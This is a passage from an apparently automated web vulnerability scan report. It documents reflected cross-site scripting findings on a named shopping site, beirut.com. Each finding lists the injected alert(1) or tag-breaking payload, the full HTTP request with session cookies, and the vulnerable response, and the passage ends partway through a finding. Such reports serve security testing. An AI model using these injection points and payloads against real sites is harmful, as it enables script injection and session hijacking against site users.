Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:24:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movie-Rentals972fb'-alert(1)-'d8b8b2132af/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.741. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be3db'-alert(1)-'f4e0b9aa4be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3be3db'-alert(1)-'f4e0b9aa4be HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movie-Rentals/3be3db'-alert(1)-'f4e0b9aa4be';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.742. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78963"><a>be44763c853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping78963"><a>be44763c853/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping78963"><a>be44763c853">
...[SNIP]...

4.743. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e62b5'-alert(1)-'b2f09b3cf7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinge62b5'-alert(1)-'b2f09b3cf7e/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppinge62b5'-alert(1)-'b2f09b3cf7e/Books-Music-Movies/05084418/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.744. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ce15<script>alert(1)</script>504dd757676 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies2ce15<script>alert(1)</script>504dd757676/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies2ce15<script>alert(1)</script>504dd757676 <a href="#" id="backlink">
...[SNIP]...

4.745. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875f4'-alert(1)-'4f3c3afd9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies875f4'-alert(1)-'4f3c3afd9bd/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:54:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Movies875f4'-alert(1)-'4f3c3afd9bd/05084418/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.746. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbac'-alert(1)-'087a074d55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/050844182bbac'-alert(1)-'087a074d55/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/050844182bbac'-alert(1)-'087a074d55/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.747. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3115'-alert(1)-'ff000cff8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Gamesb3115'-alert(1)-'ff000cff8aa/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:05:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movies-Gamesb3115'-alert(1)-'ff000cff8aa/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.748. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc1f8'-alert(1)-'fe0b72b0da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Games/6cc1f8'-alert(1)-'fe0b72b0da HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:12:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Movies/05084418/Movies-Games/6cc1f8'-alert(1)-'fe0b72b0da';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.749. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39914"><a>3128a551cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping39914"><a>3128a551cea/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping39914"><a>3128a551cea">
...[SNIP]...

4.750. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ef96'-alert(1)-'d866e2dc6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping2ef96'-alert(1)-'d866e2dc6c/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:01:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping2ef96'-alert(1)-'d866e2dc6c/Books-Music-Movies/05084418/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.751. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e180d<script>alert(1)</script>e757b572d02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Moviese180d<script>alert(1)</script>e757b572d02/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Moviese180d<script>alert(1)</script>e757b572d02 <a href="#" id="backlink">
...[SNIP]...

4.752. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be4ac'-alert(1)-'8b522bd1a75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Moviesbe4ac'-alert(1)-'8b522bd1a75/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Moviesbe4ac'-alert(1)-'8b522bd1a75/05084418/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.753. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'55efcd52eb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

